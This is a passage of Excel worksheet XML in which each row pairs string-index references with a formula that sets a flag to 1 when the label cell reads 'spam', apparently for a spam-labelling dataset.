    <row r="1347" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1347" t="s">
        <v>6602</v>
      </c>
      <c r="B1347" t="s">
        <v>5294</v>
      </c>
      <c r="C1347" s="1">
        <f>IF(B1347="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1348" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1348" t="s">
        <v>6603</v>
      </c>
      <c r="B1348" t="s">
        <v>5294</v>
      </c>
      <c r="C1348" s="1">
        <f>IF(B1348="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1349" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1349" t="s">
        <v>6604</v>
      </c>
      <c r="B1349" t="s">
        <v>5294</v>
      </c>
      <c r="C1349" s="1">
        <f>IF(B1349="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1350" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1350" t="s">
        <v>6605</v>
      </c>
      <c r="B1350" t="s">
        <v>5294</v>
      </c>
      <c r="C1350" s="1">
        <f>IF(B1350="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1351" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1351" t="s">
        <v>6606</v>
      </c>
      <c r="B1351" t="s">
        <v>5297</v>
      </c>
      <c r="C1351" s="1">
        <f>IF(B1351="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1352" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1352" t="s">
        <v>6607</v>
      </c>
      <c r="B1352" t="s">
        <v>5294</v>
      </c>
      <c r="C1352" s="1">
        <f>IF(B1352="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1353" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1353" t="s">
        <v>6608</v>
      </c>
      <c r="B1353" t="s">
        <v>5294</v>
      </c>
      <c r="C1353" s="1">
        <f>IF(B1353="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1354" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1354" t="s">
        <v>6609</v>
      </c>
      <c r="B1354" t="s">
        <v>5294</v>
      </c>
      <c r="C1354" s="1">
        <f>IF(B1354="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1355" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1355" t="s">
        <v>6610</v>
      </c>
      <c r="B1355" t="s">
        <v>5294</v>
      </c>
      <c r="C1355" s="1">
        <f>IF(B1355="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1356" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1356" t="s">
        <v>6611</v>
      </c>
      <c r="B1356" t="s">
        <v>5294</v>
      </c>
      <c r="C1356" s="1">
        <f>IF(B1356="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1357" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1357" t="s">
        <v>6349</v>
      </c>
      <c r="B1357" t="s">
        <v>5294</v>
      </c>
      <c r="C1357" s="1">
        <f>IF(B1357="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1358" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1358" t="s">
        <v>6612</v>
      </c>
      <c r="B1358" t="s">
        <v>5294</v>
      </c>
      <c r="C1358" s="1">
        <f>IF(B1358="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1359" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1359" t="s">
        <v>6613</v>
      </c>
      <c r="B1359" t="s">
        <v>5294</v>
      </c>
      <c r="C1359" s="1">
        <f>IF(B1359="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1360" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1360" t="s">
        <v>6614</v>
      </c>
      <c r="B1360" t="s">
        <v>5294</v>
      </c>
      <c r="C1360" s="1">
        <f>IF(B1360="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1361" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1361" t="s">
        <v>6615</v>
      </c>
      <c r="B1361" t="s">
        <v>5294</v>
      </c>
      <c r="C1361" s="1">
        <f>IF(B1361="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1362" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1362" t="s">
        <v>6616</v>
      </c>
      <c r="B1362" t="s">
        <v>5294</v>
      </c>
      <c r="C1362" s="1">
        <f>IF(B1362="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1363" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1363" t="s">
        <v>6617</v>
      </c>
      <c r="B1363" t="s">
        <v>5294</v>
      </c>
      <c r="C1363" s="1">
        <f>IF(B1363="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1364" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1364" t="s">
        <v>6618</v>
      </c>
      <c r="B1364" t="s">
        <v>5294</v>
      </c>
      <c r="C1364" s="1">
        <f>IF(B1364="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1365" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1365" t="s">
        <v>6619</v>
      </c>
      <c r="B1365" t="s">
        <v>5294</v>
      </c>
      <c r="C1365" s="1">
        <f>IF(B1365="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1366" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1366" t="s">
        <v>6620</v>
      </c>
      <c r="B1366" t="s">
        <v>5294</v>
      </c>
      <c r="C1366" s="1">
        <f>IF(B1366="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1367" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1367" t="s">
        <v>6621</v>
      </c>
      <c r="B1367" t="s">
        <v>5297</v>
      </c>
      <c r="C1367" s="1">
        <f>IF(B1367="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1368" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1368" t="s">
        <v>6622</v>
      </c>
      <c r="B1368" t="s">
        <v>5294</v>
      </c>
      <c r="C1368" s="1">
        <f>IF(B1368="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1369" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1369" t="s">
        <v>6623</v>
      </c>
      <c r="B1369" t="s">
        <v>5294</v>
      </c>
      <c r="C1369" s="1">
        <f>IF(B1369="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1370" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1370" t="s">
        <v>6624</v>
      </c>
      <c r="B1370" t="s">
        <v>5294</v>
      </c>
      <c r="C1370" s="1">
        <f>IF(B1370="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1371" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1371" t="s">
        <v>6625</v>
      </c>
      <c r="B1371" t="s">
        <v>5294</v>
      </c>
      <c r="C1371" s="1">
        <f>IF(B1371="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1372" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1372" t="s">
        <v>6626</v>
      </c>
      <c r="B1372" t="s">
        <v>5294</v>
      </c>
      <c r="C1372" s="1">
        <f>IF(B1372="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1373" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1373" t="s">
        <v>6627</v>
      </c>
      <c r="B1373" t="s">
        <v>5294</v>
      </c>
      <c r="C1373" s="1">
        <f>IF(B1373="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1374" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1374" t="s">
        <v>6628</v>
      </c>
      <c r="B1374" t="s">
        <v>5294</v>
      </c>
      <c r="C1374" s="1">
        <f>IF(B1374="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1375" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1375" t="s">
        <v>6629</v>
      </c>
      <c r="B1375" t="s">
        <v>5297</v>
      </c>
      <c r="C1375" s="1">
        <f>IF(B1375="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1376" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1376" t="s">
        <v>6630</v>
      </c>
      <c r="B1376" t="s">
        <v>5297</v>
      </c>
      <c r="C1376" s="1">
        <f>IF(B1376="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1377" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1377" t="s">
        <v>6631</v>
      </c>
      <c r="B1377" t="s">
        <v>5294</v>
      </c>
      <c r="C1377" s="1">
        <f>IF(B1377="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1378" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1378" t="s">
        <v>6632</v>
      </c>
      <c r="B1378" t="s">
        <v>5294</v>
      </c>
      <c r="C1378" s="1">
        <f>IF(B1378="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1379" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1379" t="s">
        <v>6633</v>
      </c>
      <c r="B1379" t="s">
        <v>5297</v>
      </c>
      <c r="C1379" s="1">
        <f>IF(B1379="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1380" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1380" t="s">
        <v>6634</v>
      </c>
      <c r="B1380" t="s">
        <v>5294</v>
      </c>
      <c r="C1380" s="1">
        <f>IF(B1380="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1381" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1381" t="s">
        <v>6483</v>
      </c>
      <c r="B1381" t="s">
        <v>5297</v>
      </c>
      <c r="C1381" s="1">
        <f>IF(B1381="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1382" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1382" t="s">
        <v>6635</v>
      </c>
      <c r="B1382" t="s">
        <v>5294</v>
      </c>
      <c r="C1382" s="1">
        <f>IF(B1382="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1383" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1383" t="s">
        <v>6636</v>
      </c>
      <c r="B1383" t="s">
        <v>5294</v>
      </c>
      <c r="C1383" s="1">
        <f>IF(B1383="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1384" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1384" t="s">
        <v>6637</v>
      </c>
      <c r="B1384" t="s">
        <v>5294</v>
      </c>
      <c r="C1384" s="1">
        <f>IF(B1384="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1385" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1385" t="s">
        <v>6638</v>
      </c>
      <c r="B1385" t="s">
        <v>5294</v>
      </c>
      <c r="C1385" s="1">
        <f>IF(B1385="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1386" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1386" t="s">
        <v>6639</v>
      </c>
      <c r="B1386" t="s">
        <v>5294</v>
      </c>
      <c r="C1386" s="1">
        <f>IF(B1386="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1387" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1387" t="s">
        <v>6640</v>
      </c>
      <c r="B1387" t="s">
        <v>5294</v>
      </c>
      <c r="C1387" s="1">
        <f>IF(B1387="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1388" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1388" t="s">
        <v>6641</v>
      </c>
      <c r="B1388" t="s">
        <v>5294</v>
      </c>
      <c r="C1388" s="1">
        <f>IF(B1388="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1389" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1389" t="s">
        <v>6642</v>
      </c>
      <c r="B1389" t="s">
        <v>5294</v>
      </c>
      <c r="C1389" s="1">
        <f>IF(B1389="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1390" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1390" t="s">
        <v>6643</v>
      </c>
      <c r="B1390" t="s">
        <v>5294</v>
      </c>
      <c r="C1390" s="1">
        <f>IF(B1390="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1391" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1391" t="s">
        <v>6644</v>
      </c>
      <c r="B1391" t="s">
        <v>5294</v>
      </c>
      <c r="C1391" s="1">
        <f>IF(B1391="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1392" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1392" t="s">
        <v>6645</v>
      </c>
      <c r="B1392" t="s">
        <v>5294</v>
      </c>
      <c r="C1392" s="1">
        <f>IF(B1392="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1393" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1393" t="s">
        <v>6646</v>
      </c>
      <c r="B1393" t="s">
        <v>5294</v>
      </c>
      <c r="C1393" s="1">
        <f>IF(B1393="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1394" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1394" t="s">
        <v>6647</v>
      </c>
      <c r="B1394" t="s">
        <v>5294</v>
      </c>
      <c r="C1394" s="1">
        <f>IF(B1394="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1395" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1395" t="s">
        <v>6648</v>
      </c>
      <c r="B1395" t="s">
        <v>5294</v>
      </c>
      <c r="C1395" s="1">
        <f>IF(B1395="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1396" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1396" t="s">
        <v>6649</v>
      </c>
      <c r="B1396" t="s">
        <v>5294</v>
      </c>
      <c r="C1396" s="1">
        <f>IF(B1396="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1397" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1397" t="s">
        <v>6650</v>
      </c>
      <c r="B1397" t="s">
        <v>5294</v>
      </c>
      <c r="C1397" s="1">
        <f>IF(B1397="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1398" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1398" t="s">
        <v>6651</v>
      </c>
      <c r="B1398" t="s">
        <v>5294</v>
      </c>
      <c r="C1398" s="1">
        <f>IF(B1398="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1399" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1399" t="s">
        <v>6652</v>
      </c>
      <c r="B1399" t="s">
        <v>5294</v>
      </c>
      <c r="C1399" s="1">
        <f>IF(B1399="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1400" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1400" t="s">
        <v>6653</v>
      </c>
      <c r="B1400" t="s">
        <v>5294</v>
      </c>
      <c r="C1400" s="1">
        <f>IF(B1400="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1401" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1401" t="s">
        <v>6654</v>
      </c>
      <c r="B1401" t="s">
        <v>5294</v>
      </c>
      <c r="C1401" s="1">
        <f>IF(B1401="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1402" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1402" t="s">
        <v>6655</v>
      </c>
      <c r="B1402" t="s">
        <v>5294</v>
      </c>
      <c r="C1402" s="1">
        <f>IF(B1402="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1403" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1403" t="s">
        <v>6656</v>
      </c>
      <c r="B1403" t="s">
        <v>5294</v>
      </c>
      <c r="C1403" s="1">
        <f>IF(B1403="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1404" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1404" t="s">
        <v>6654</v>
      </c>
      <c r="B1404" t="s">
        <v>5294</v>
      </c>
      <c r="C1404" s="1">
        <f>IF(B1404="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1405" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1405" t="s">
        <v>6657</v>
      </c>
      <c r="B1405" t="s">
        <v>5294</v>
      </c>
      <c r="C1405" s="1">
        <f>IF(B1405="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1406" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1406" t="s">
        <v>6658</v>
      </c>
      <c r="B1406" t="s">
        <v>5294</v>
      </c>
      <c r="C1406" s="1">
        <f>IF(B1406="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1407" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1407" t="s">
        <v>6659</v>
      </c>
      <c r="B1407" t="s">
        <v>5294</v>
      </c>
      <c r="C1407" s="1">
        <f>IF(B1407="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1408" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1408" t="s">
        <v>6660</v>
      </c>
      <c r="B1408" t="s">
        <v>5297</v>
      </c>
      <c r="C1408" s="1">
        <f>IF(B1408="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1409" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1409" t="s">
        <v>6661</v>
      </c>
      <c r="B1409" t="s">
        <v>5294</v>
      </c>
      <c r="C1409" s="1">
        <f>IF(B1409="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1410" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1410" t="s">
        <v>6662</v>
      </c>
      <c r="B1410" t="s">
        <v>5294</v>
      </c>
      <c r="C1410" s="1">
        <f>IF(B1410="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1411" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1411" t="s">
        <v>6663</v>
      </c>
      <c r="B1411" t="s">
        <v>5294</v>
      </c>
      <c r="C1411" s="1">
        <f>IF(B1411="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1412" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1412" t="s">
        <v>6664</v>
      </c>
      <c r="B1412" t="s">
        <v>5294</v>
      </c>
      <c r="C1412" s="1">
        <f>IF(B1412="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1413" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1413" t="s">
        <v>6665</v>
      </c>
      <c r="B1413" t="s">
        <v>5294</v>
      </c>
      <c r="C1413" s="1">
        <f>IF(B1413="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1414" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1414" t="s">
        <v>5543</v>
      </c>
      <c r="B1414" t="s">
        <v>5294</v>
      </c>
      <c r="C1414" s="1">
        <f>IF(B1414="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1415" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1415" t="s">
        <v>6666</v>
      </c>
      <c r="B1415" t="s">
        <v>5297</v>
      </c>
      <c r="C1415" s="1">
        <f>IF(B1415="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1416" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1416" t="s">
        <v>6667</v>
      </c>
      <c r="B1416" t="s">
        <v>5294</v>
      </c>
      <c r="C1416" s="1">
        <f>IF(B1416="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1417" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1417" t="s">
        <v>6668</v>
      </c>
      <c r="B1417" t="s">
        <v>5294</v>
      </c>
      <c r="C1417" s="1">
        <f>IF(B1417="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1418" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1418" t="s">
        <v>6669</v>
      </c>
      <c r="B1418" t="s">
        <v>5294</v>
      </c>
      <c r="C1418" s="1">
        <f>IF(B1418="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1419" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1419" t="s">
        <v>6670</v>
      </c>
      <c r="B1419" t="s">
        <v>5294</v>
      </c>
      <c r="C1419" s="1">
        <f>IF(B1419="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1420" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1420" t="s">
        <v>6671</v>
      </c>
      <c r="B1420" t="s">
        <v>5294</v>
      </c>
      <c r="C1420" s="1">
        <f>IF(B1420="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1421" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1421" t="s">
        <v>6672</v>
      </c>
      <c r="B1421" t="s">
        <v>5294</v>
      </c>
      <c r="C1421" s="1">
        <f>IF(B1421="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1422" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1422" t="s">
        <v>6673</v>
      </c>
      <c r="B1422" t="s">
        <v>5294</v>
      </c>
      <c r="C1422" s="1">
        <f>IF(B1422="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1423" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1423" t="s">
        <v>6674</v>
      </c>
      <c r="B1423" t="s">
        <v>5294</v>
      </c>
      <c r="C1423" s="1">
        <f>IF(B1423="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1424" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1424" t="s">
        <v>6675</v>
      </c>
      <c r="B1424" t="s">
        <v>5297</v>
      </c>
      <c r="C1424" s="1">
        <f>IF(B1424="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1425" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1425" t="s">
        <v>6676</v>
      </c>
      <c r="B1425" t="s">
        <v>5294</v>
      </c>
      <c r="C1425" s="1">
        <f>IF(B1425="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1426" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1426" t="s">
        <v>6677</v>
      </c>
      <c r="B1426" t="s">
        <v>5294</v>
      </c>
      <c r="C1426" s="1">
        <f>IF(B1426="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1427" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1427" t="s">
        <v>6678</v>
      </c>
      <c r="B1427" t="s">
        <v>5294</v>
      </c>
      <c r="C1427" s="1">
        <f>IF(B1427="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1428" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1428" t="s">
        <v>6531</v>
      </c>
      <c r="B1428" t="s">
        <v>5294</v>
      </c>
      <c r="C1428" s="1">
        <f>IF(B1428="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1429" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1429" t="s">
        <v>6679</v>
      </c>
      <c r="B1429" t="s">
        <v>5294</v>
      </c>
      <c r="C1429" s="1">
        <f>IF(B1429="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1430" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1430" t="s">
        <v>6680</v>
      </c>
      <c r="B1430" t="s">
        <v>5294</v>
      </c>
      <c r="C1430" s="1">
        <f>IF(B1430="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1431" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1431" t="s">
        <v>6681</v>
      </c>
      <c r="B1431" t="s">
        <v>5297</v>
      </c>
      <c r="C1431" s="1">
        <f>IF(B1431="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1432" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1432" t="s">
        <v>6682</v>
      </c>
      <c r="B1432" t="s">
        <v>5294</v>
      </c>
      <c r="C1432" s="1">
        <f>IF(B1432="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1433" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1433" t="s">
        <v>6683</v>
      </c>
      <c r="B1433" t="s">
        <v>5294</v>
      </c>
      <c r="C1433" s="1">
        <f>IF(B1433="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1434" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1434" t="s">
        <v>6684</v>
      </c>
      <c r="B1434" t="s">
        <v>5294</v>
      </c>
      <c r="C1434" s="1">
        <f>IF(B1434="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1435" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1435" t="s">
        <v>6685</v>
      </c>
      <c r="B1435" t="s">
        <v>5294</v>
      </c>
      <c r="C1435" s="1">
        <f>IF(B1435="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1436" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1436" t="s">
        <v>6686</v>
      </c>
      <c r="B1436" t="s">
        <v>5294</v>
      </c>
      <c r="C1436" s="1">
        <f>IF(B1436="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1437" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1437" t="s">
        <v>6687</v>
      </c>
      <c r="B1437" t="s">
        <v>5294</v>
      </c>
      <c r="C1437" s="1">
        <f>IF(B1437="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1438" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1438" t="s">
        <v>6688</v>
      </c>
      <c r="B1438" t="s">
        <v>5294</v>
      </c>
      <c r="C1438" s="1">
        <f>IF(B1438="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1439" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1439" t="s">
        <v>6689</v>
      </c>
      <c r="B1439" t="s">
        <v>5294</v>
      </c>
      <c r="C1439" s="1">
        <f>IF(B1439="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1440" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1440" t="s">
        <v>6690</v>
      </c>
      <c r="B1440" t="s">
        <v>5294</v>
      </c>
      <c r="C1440" s="1">
        <f>IF(B1440="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1441" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1441" t="s">
        <v>6691</v>
      </c>
      <c r="B1441" t="s">
        <v>5294</v>
      </c>
      <c r="C1441" s="1">
        <f>IF(B1441="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1442" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1442" t="s">
        <v>6692</v>
      </c>
      <c r="B1442" t="s">
        <v>5294</v>
      </c>
      <c r="C1442" s="1">
        <f>IF(B1442="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1443" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1443" t="s">
        <v>6693</v>
      </c>
      <c r="B1443" t="s">
        <v>5294</v>
      </c>
      <c r="C1443" s="1">
        <f>IF(B1443="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1444" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1444" t="s">
        <v>6694</v>
      </c>
      <c r="B1444" t="s">
        <v>5294</v>
      </c>
      <c r="C1444" s="1">
        <f>IF(B1444="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1445" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1445" t="s">
        <v>6695</v>
      </c>
      <c r="B1445" t="s">
        <v>5297</v>
      </c>
      <c r="C1445" s="1">
        <f>IF(B1445="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1446" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1446" t="s">
        <v>6696</v>
      </c>
      <c r="B1446" t="s">
        <v>5294</v>
      </c>
      <c r="C1446" s="1">
        <f>IF(B1446="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1447" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1447" t="s">
        <v>6697</v>
      </c>
      <c r="B1447" t="s">
        <v>5294</v>
      </c>
      <c r="C1447" s="1">
        <f>IF(B1447="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1448" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1448" t="s">
        <v>6698</v>
      </c>
      <c r="B1448" t="s">
        <v>5294</v>
      </c>
      <c r="C1448" s="1">
        <f>IF(B1448="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1449" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1449" t="s">
        <v>6699</v>
      </c>
      <c r="B1449" t="s">
        <v>5294</v>
      </c>
      <c r="C1449" s="1">
        <f>IF(B1449="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1450" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1450" t="s">
        <v>6700</v>
      </c>
      <c r="B1450" t="s">
        <v>5297</v>
      </c>
      <c r="C1450" s="1">
        <f>IF(B1450="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
